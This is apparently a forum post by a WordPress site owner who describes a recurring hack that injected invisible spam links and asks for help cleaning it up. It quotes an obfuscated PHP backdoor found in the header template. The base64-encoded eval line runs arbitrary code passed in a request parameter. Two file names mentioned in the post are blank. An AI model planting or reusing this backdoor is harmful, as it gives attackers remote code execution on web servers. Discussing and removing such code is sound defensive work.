About a month ago one my sites was spammed or hacked. Google dropped me because the pages had a bunch of invisible links heading out to viagra, et al .. I found what I thought was the source, deleted it, and changed my password, etc. google lovingly welcomed me back. Yesterday I found the same hack again - I believe it included this:
<?php eval(base64_decode("aWYoQCRfUkVRVUVTVFsiQSJdID09ICJiIiBhbmQgaXNzZXQoJF9SRVFVRVNUWyJDIl0pKSBldmFsKHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9SRVFVRVNUWyJDIl0pKSk7")); ?>
sitting in the header template.
There was also a file called:
on the site, and, last time, another, called:
in the includes folder. Are those spam files?
That's all the files I found, anyway.
I upgraded to the newer wordpress versions today, so hopefully that problem won't reoccur. Any further information or advice would be appreciated.